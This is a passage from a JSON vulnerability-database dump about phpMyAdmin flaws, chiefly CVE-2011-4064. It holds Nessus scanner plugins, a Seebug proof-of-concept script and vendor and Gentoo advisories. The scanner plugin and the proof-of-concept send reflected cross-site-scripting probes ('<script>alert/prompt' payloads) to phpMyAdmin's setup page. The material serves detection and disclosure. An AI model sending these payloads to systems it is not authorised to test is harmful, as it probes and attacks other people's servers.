\"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC14\", reference:\"phpMyAdmin-3.4.7-1.fc14\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-12-13T08:52:25", "bulletinFamily": "scanner", "description": "The version of phpMyAdmin hosted on the remote server is 3.4.x prior\nto 3.4.6 and is affected by a cross-site scripting vulnerability. The\n", "modified": "2019-12-02T00:00:00", "id": "PHPMYADMIN_PMASA_2011_16.NASL", "href": "https://www.tenable.com/plugins/nessus/56652", "published": "2011-10-26T00:00:00", "title": "phpMyAdmin 3.4.x < 3.4.6 XSS (PMASA-2011-16)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(56652);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/07/24 18:56:11\");\n\n script_cve_id(\"CVE-2011-4064\");\n script_bugtraq_id(50175);\n\n script_name(english:\"phpMyAdmin 3.4.x < 3.4.6 XSS (PMASA-2011-16)\");\n script_summary(english:\"Checks for cross-site scripting in phpMyAdmin\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\na cross-site scripting vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of phpMyAdmin hosted on the remote server is 3.4.x prior\nto 3.4.6 and is affected by a cross-site scripting vulnerability. The\n'Servers-0-verbose' parameter is not properly sanitized by methods in\n'libraries/config/ConfigFile.class.php' as called by the script\n'setup/index.php'. Persistent cross-site scripting is possible if\nimproper filesystem permissions are in place.\n\");\n\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?45ba6757\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2011-16.php\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the vendor patches or upgrade to phpMyAdmin version 3.4.6 or\nlater.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/10/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/10/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpmyadmin:phpmyadmin\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"phpMyAdmin_detect.nasl\");\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/phpMyAdmin\", \"www/PHP\");\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\n\nport = get_http_port(default:80, php:TRUE);\ninstall = get_install_from_kb(appname:\"phpMyAdmin\", port:port, exit_on_fail:TRUE);\ndir = install['dir'];\n\nr = http_send_recv3(\n port : port,\n method : \"GET\",\n item : dir\n + '/setup/index.php?tab_hash=&check_page_refresh=1'\n + '&page=servers&mode=add&submit=New+server',\n exit_on_fail : TRUE\n);\n\n# parse cookie out\nheaders = parse_http_headers(status_line:r[0], headers:r[1]);\nif (isnull(headers)) exit(1, \"Error parsing HTTP headers on port \"+port+\".\");\n\ncookie_header = headers['set-cookie'];\nif (isnull(cookie_header)) exit(1, \"Did not receive a phpMyAdmin cookie on port \"+port+\".\");\ncookie = get_any_http_cookie(name:'phpMyAdmin');\nif (strlen(cookie) == 0) exit(1, \"'phpMyAdmin cookie not received on port \"+port+\".\");\n\n# parse token out\npattern = 'name=\"token\"[ ]+value=\"(.*)\"';\nforeach line (split(r[2], keep:0))\n{\n matches = eregmatch(\n string: line,\n pattern: pattern\n );\n\n if (!isnull(matches))\n {\n token = matches[1];\n break;\n }\n}\nif (isnull(token)) exit(1, \"Unable to parse token from response on port \"+port+\".\");\n\nmagic = 'NESSUS_' + unixtime() + SCRIPT_NAME;\nxss = '<script>alert(/'+magic+'/)</script>';\n\npost_data = 'phpMyAdmin='\n +cookie+\n '&tab_hash=&check_page_refresh=1&token='\n +token+\n '&Servers-0-verbose='\n +xss+\n '&Servers-0-host=localhost&Servers-0-port=&Servers-0-socket=&Servers-0-connect_type=tcp&Servers-0-extension=mysqli&submit_save=Save&Servers-0-auth_type=cookie&Servers-0-user=root&Servers-0-password=&Servers-0-auth_swekey_config=&Servers-0-auth_http_realm=&Servers-0-SignonSession=&Servers-0-SignonURL=&Servers-0-LogoutURL=&Servers-0-only_db=&Servers-0-only_db-userprefs-allow=on&Servers-0-hide_db=&Servers-0-hide_db-userprefs-allow=on&Servers-0-AllowRoot=on&Servers-0-DisableIS=on&Servers-0-AllowDeny-order=&Servers-0-AllowDeny-rules=&Servers-0-ShowDatabasesCommand=SHOW+DATABASES&Servers-0-pmadb=&Servers-0-controluser=&Servers-0-controlpass=&Servers-0-verbose_check=on&Servers-0-bookmarktable=&Servers-0-relation=&Servers-0-userconfig=&Servers-0-table_info=&Servers-0-column_info=&Servers-0-history=&Servers-0-tracking=&Servers-0-table_coords=&Servers-0-pdf_pages=&Servers-0-designer_coords=&Servers-0-tracking_default_statements=CREATE+TABLE%2CALTER+TABLE%2CDROP+TABLE%2CRENAME+TABLE%2CCREATE+INDEX%2CDROP+INDEX%2CINSERT%2CUPDATE%2CDELETE%2CTRUNCATE%2CREPLACE%2CCREATE+VIEW%2CALTER+VIEW%2CDROP+VIEW%2CCREATE+DATABASE%2CALTER+DATABASE%2CDROP+DATABASE&Servers-0-tracking_add_drop_view=on&Servers-0-tracking_add_drop_table=on&Servers-0-tracking_add_drop_database=on';\n\nreferrer_url = build_url(port:port, qs:dir + '/setup/index.php?tab_hash=&check_page_refresh=1&token='+token+'&page=servers&mode=add&submit=New+server');\nrequest_url = '/pma/setup/index.php?tab_hash=&check_page_refresh=1&token='+token+'&page=servers&mode=add&submit=New+server';\n\nr = http_send_recv3(\n port : port,\n method : \"POST\",\n item : request_url,\n data : post_data,\n follow_redirect : 1,\n add_headers : make_array(\n 'Referrer' , referrer_url,\n 'Content-Type' , 'application/x-www-form-urlencoded'\n ),\n exit_on_fail : TRUE\n);\n\nif (\n \"<h4>Use SSL (\"+xss >< r[2] &&\n \"<title>phpMyAdmin setup</title>\" >< r[2]\n)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n\n if (report_verbosity > 0)\n {\n if (report_verbosity > 1)\n {\n last_req = http_last_sent_request();\n\n # grab vuln output\n vuln_output = strstr(r[2], '<h4>Use SSL');\n vuln_output = substr(vuln_output, 0, stridx(vuln_output, '.</div>'));\n\n footer = '\\nThe full request was : \\n\\n'\n + last_req\n + '\\nThe following HTTP POST data was used :\\n\\n'\n + post_data\n + '\\n\\n'\n + '\\nThe HTML output was :\\n\\n'\n + vuln_output;\n\n }\n report = get_vuln_report(\n port : port,\n items : request_url,\n trailer : footer\n );\n security_warning(port:port, extra:report);\n }\n else security_warning(port);\n exit(0);\n}\nelse exit(0, \"The phpMyAdmin install at \"+build_url(port:port, qs:dir)+\" is not affected.\");\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-12-13T07:33:27", "bulletinFamily": "scanner", "description": "The remote host is affected by the vulnerability described in GLSA-201201-01\n(phpMyAdmin: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in phpMyAdmin. Please\n review the CVE identifiers and phpMyAdmin Security Advisories referenced\n below for details.\n \nImpact :\n\n Remote attackers might be able to insert and execute PHP code, include\n and execute local PHP files, or perform Cross-Site Scripting (XSS)\n attacks via various vectors.\n \nWorkaround :\n\n There is no known workaround at this time.", "modified": "2019-12-02T00:00:00", "id": "GENTOO_GLSA-201201-01.NASL", "href": "https://www.tenable.com/plugins/nessus/57433", "published": "2012-01-05T00:00:00", "title": "GLSA-201201-01 : phpMyAdmin: Multiple vulnerabilities", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201201-01.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(57433);\n script_version(\"1.15\");\n script_cvs_date(\"Date: 2019/02/07 9:34:55\");\n\n script_cve_id(\"CVE-2008-7251\", \"CVE-2008-7252\", \"CVE-2010-2958\", \"CVE-2010-3055\", \"CVE-2010-3056\", \"CVE-2010-3263\", \"CVE-2011-0986\", \"CVE-2011-0987\", \"CVE-2011-2505\", \"CVE-2011-2506\", \"CVE-2011-2507\", \"CVE-2011-2508\", \"CVE-2011-2642\", \"CVE-2011-2643\", \"CVE-2011-2718\", \"CVE-2011-2719\", \"CVE-2011-3646\", \"CVE-2011-4064\", \"CVE-2011-4107\", \"CVE-2011-4634\", \"CVE-2011-4780\", \"CVE-2011-4782\");\n script_bugtraq_id(37826, 42584, 42591, 42874, 46359, 48563, 48874, 50175, 50497, 51099, 51166, 51226);\n script_xref(name:\"GLSA\", value:\"201201-01\");\n script_xref(name:\"TRA\", value:\"TRA-2010-02\");\n\n script_name(english:\"GLSA-201201-01 : phpMyAdmin: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201201-01\n(phpMyAdmin: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in phpMyAdmin. Please\n review the CVE identifiers and phpMyAdmin Security Advisories referenced\n below for details.\n \nImpact :\n\n Remote attackers might be able to insert and execute PHP code, include\n and execute local PHP files, or perform Cross-Site Scripting (XSS)\n attacks via various vectors.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2010-1.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2010-1/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2010-2.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2010-2/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2010-4.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2010-4/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2010-5.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2010-5/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2010-6.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2010-6/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2010-7.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2010-7/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-1.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-1/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-10.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-10/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-11.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-11/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-12.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-12/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-15.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-15/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-16.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-16/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-17.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-17/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-18.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-18/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-19.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-19/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-2.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-2/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-20.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-20/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-5.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-5/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-6.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-6/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-7.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-7/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-8.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-8/\"\n );\n # https://www.phpmyadmin.net/home_page/security/PMASA-2011-9.php\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.phpmyadmin.net/security/PMASA-2011-9/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201201-01\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2010-02\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All phpMyAdmin users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-db/phpmyadmin-3.4.9'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Phpmyadmin 3.x RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/01/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/01/05\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"dev-db/phpmyadmin\", unaffected:make_list(\"ge 3.4.9\"), vulnerable:make_list(\"lt 3.4.9\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2017-11-19T17:58:54", "bulletinFamily": "exploit", "description": "Bugtraq ID: 50175\r\nCVE ID\uff1aCVE-2011-4064\r\n\r\nphpMyAdmin\u662f\u4e00\u6b3e\u57fa\u4e8ePHP\u7684MySQL\u7ba1\u7406\u7a0b\u5e8f\u3002\r\n\u90e8\u5206\u4f20\u9012\u7ed9setup.php\u7684\u8f93\u5165\u5728\u8fd4\u56de\u7528\u6237\u4e4b\u524d\u7f3a\u5c11\u8fc7\u6ee4\uff0c\u653b\u51fb\u8005\u6784\u5efa\u6076\u610f\u94fe\u63a5\uff0c\u8bf1\u4f7f\u7528\u6237\u89e3\u6790\uff0c\u53ef\u5bfc\u81f4\u6076\u610f\u811a\u672c\u5728\u76ee\u6807\u7528\u6237\u6d4f\u89c8\u5668\u4e0a\u6267\u884c\uff0c\u53ef\u83b7\u5f97\u76ee\u6807\u7528\u6237\u654f\u611f\u4fe1\u606f\u6216\u52ab\u6301\u7528\u6237\u4f1a\u8bdd\u3002\r\n\u5982\u679c\u5b58\u5728\u914d\u7f6e\u76ee\u5f55\u5e76\u53ef\u5199\uff0c\u90a3\u4e48XSS\u8d1f\u8f7d\u53ef\u4fdd\u5b58\u5728\u6b64\u76ee\u5f55\u4e2d\u3002\r\n\r\nphpMyAdmin 3.x\r\n\u5382\u5546\u89e3\u51b3\u65b9\u6848\r\nphpMyAdmin 3.4.6\u5df2\u7ecf\u4fee\u590d\u6b64\u6f0f\u6d1e\uff0c\u5efa\u8bae\u7528\u6237\u4e0b\u8f7d\u4f7f\u7528\uff1a\r\nhttp://www.phpmyadmin.net/", "modified": "2011-10-18T00:00:00", "published": "2011-10-18T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-23110", "id": "SSV:23110", "title": "phpMyAdmin Setup\u63a5\u53e3\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e", "type": "seebug", "sourceData": "\n #!/usr/bin/env python\r\n# coding: utf-8\r\n\r\nfrom pocsuite.net import req\r\nfrom pocsuite.poc import POCBase, Output\r\nfrom pocsuite.utils import register\r\nimport requests\r\n\r\n'''\r\n\u539f\u59cb\u5229\u7528\u94fe\u63a5\uff1a\r\nhttp://www.example.com/phpMyAdmin-2.11.1/scripts/setup.php?>'\"><script>alert('xss');</script>\r\n\r\n\u501f\u9274wvs\u4f7f\u7528prompt\u66ff\u4ee3alert\u4e00\u5b9a\u7a0b\u5ea6\u7ed5\u8fc7\u9650\u5236\uff0c\u5e76\u4f7f\u7528\u7279\u6b8a\u5b57\u6bb5\u8fdb\u884c\u5339\u914d\uff1a\r\n<script>prompt(\"SEBUG@TEST\");</script>\r\n\r\n'''\r\n\r\nclass TestPOC(POCBase):\r\n vulID = '23110' # ssvid\r\n version = '1.0'\r\n author = ['XXXXX']\r\n vulDate = ''\r\n createDate = '2016-01-01'\r\n updateDate = '2016-01-01'\r\n references = ['http://www.sebug.net/vuldb/ssvid-23110']\r\n name = 'phpMyAdmin Setup\u63a5\u53e3\u8de8\u7ad9\u811a\u672c\u6f0f\u6d1e'\r\n appPowerLink = 'http://www.phpmyadmin.net/'\r\n appName = 'phpMyAdmin'\r\n appVersion = ''\r\n vulType = 'XSS'\r\n desc = '''\r\n '''\r\n samples = ['']\r\n \r\n def _verify(self):\r\n result = {}\r\n\r\n vulurl = self.url + \"/phpMyAdmin-2.11.1/scripts/setup.php?>'\" + '\"><script>prompt(\"SEBUG@TEST\");</script>'\r\n\r\n resp = requests.get(vulurl)\r\n print resp.url\r\n \r\n if '<script>prompt(\"SEBUG@TEST\");</script>' in resp.content:\r\n result['XSSInfo'] = {}\r\n result['XSSInfo']['URL'] = resp.url\r\n\r\n return self.parse_output(result)\r\n\r\n def _attack(self):\r\n return self._verify()\r\n\r\n def parse_output(self, result):\r\n #parse output\r\n output = Output(self)\r\n if result:\r\n output.success(result)\r\n else:\r\n output.fail('Internet nothing returned')\r\n return output\r\n\r\nregister(TestPOC)\n ", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-23110"}], "phpmyadmin": [{"lastseen": "2019-05-29T17:20:11", "bulletinFamily": "software", "description": "## PMASA-2011-16\n\n**Announcement-ID:** PMASA-2011-16\n\n**Date:** 2011-10-17\n\n### Summary\n\nXSS in setup.\n\n### Description\n\nCrafted values entered in the setup interface can produce XSS; also, if the config directory exists and is writeable, the XSS payload can be saved to this directory.\n\n### Severity\n\nWe consider this vulnerability to be non critical.\n\n### Mitigation factor\n\nThe documentation warns against leaving this directory writeable; also a warning appears on the home page. Also, this XSS would target only the users who visit /setup.\n\n### Affected Versions\n\nVersions 3.4.x are affected.\n\n### Solution\n\nUpgrade to phpMyAdmin 3.4.6 or newer or apply the related patch listed below.\n\n### References\n\nThanks to Jakub Ga\u0142czyk (<http://hauntit.blogspot.com>) for reporting this issue.\n\nAssigned CVE ids: [CVE-2011-4064](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4064>)\n\nCWE ids: [CWE-661](<https://cwe.mitre.org/data/definitions/661.html>) [CWE-79](<https://cwe.mitre.org/data/definitions/79.html>)\n\n### Patches\n\nThe following commits have been made to fix this issue:\n\n * [ca597dc423f3eebcca95ff33b088a03e39109115](<https://github.com/phpmyadmin/phpmyadmin/commit/ca597dc423f3eebcca95ff33b088a03e39109115>)\n * [1af420e22367ae72ff4091adb1620e59ddad5ba6](<https://github.com/phpmyadmin/phpmyadmin/commit/1af420e22367ae72ff4091adb1620e59ddad5ba6>)\n\n### More information\n\nFor further information and in case of questions, please contact the phpMyAdmin team. Our website is [ phpmyadmin.net](<https://www.phpmyadmin.net/>). \n", "modified": "2011-10-17T00:00:00", "published": "2011-10-17T00:00:00", "id": "PHPMYADMIN:PMASA-2011-16", "href": "https://www.phpmyadmin.net/security/PMASA-2011-16/", "title": "XSS in setup.", "type": "phpmyadmin", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T17:20:09", "bulletinFamily": "software", "description": "## PMASA-2011-15\n\n**Announcement-ID:** PMASA-2011-15\n\n**Date:** 2011-10-17\n\n### Summary\n\nPath disclosure due to insufficient url parameter validation.\n\n### Description\n\nWhen the js_frame parameter of phpmyadmin.css.php is defined as an array, an error message shows the full path of this file, leading to possible further attacks.\n\n### Severity\n\nWe consider this vulnerability to be non critical.\n\n### Mitigation factor\n\nFor the error messages to be displayed, php.ini's error_reporting must be set to E_ALL and display_errors must be On (these settings are not recommended on a production server in the PHP manual).\n\n### Affected Versions\n\nVersions 3.4.x are affected.\n\n### Solution\n\nUpgrade to phpMyAdmin 3.4.6 or newer or apply the related patch listed below.\n\n### References\n\nThanks to [Mihail Ursu](<http://securitate.md/>) for reporting this issue.\n\nAssigned CVE ids: [CVE-2011-3646](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3646>)\n\nCWE ids: [CWE-20](<https://cwe.mitre.org/data/definitions/20.html>) [CWE-200](<https://cwe.mitre.org/data/definitions/200.html>)\n\n### Patches\n\nThe following commits have been made to fix this issue:\n\n * [d35cba980893aa6e6455fd6e6f14f3e3f1204c52](<https://github.com/phpmyadmin/phpmyadmin/commit/d35cba980893aa6e6455fd6e6f14f3e3f1204c52>)\n\nThe following commits have been made on the 3.4 branch to fix this issue:\n\n * [e05b37d3c9e5b99e8a779fe55780d92df17b4a55](<https://github.com/phpmyadmin/phpmyadmin/commit/e05b37d3c9e5b99e8a779fe55780d92df17b4a55>)\n\n### More information\n\nFor further information and in case of questions, please contact the phpMyAdmin team. Our website is [ phpmyadmin.net](<https://www.phpmyadmin.net/>). \n", "modified": "2011-10-17T00:00:00", "published": "2011-10-17T00:00:00", "id": "PHPMYADMIN:PMASA-2011-15", "href": "https://www.phpmyadmin.net/security/PMASA-2011-15/", "title": "Path disclosure due to insufficient url parameter validation.", "type": "phpmyadmin", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:45", "bulletinFamily": "unix", "description": "### Background\n\nphpMyAdmin is a web-based management tool for MySQL databases. \n\n### Description\n\nMultiple vulnerabilities have been discovered in phpMyAdmin. Please review the CVE identifiers and phpMyAdmin Security Advisories referenced below for details. \n\n### Impact\n\nRemote attackers might be able to insert and execute PHP code, include and execute local PHP files, or perform Cross-Site Scripting (XSS) attacks via various vectors. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll phpMyAdmin users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=dev-db/phpmyadmin-3.4.9\"", "modified": "2012-01-04T00:00:00", "published": "2012-01-04T00:00:00", "id": "GLSA-201201-01", "href": "https://security.gentoo.org/glsa/201201-01", "type": "gentoo", "title": "phpMyAdmin: Multiple vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}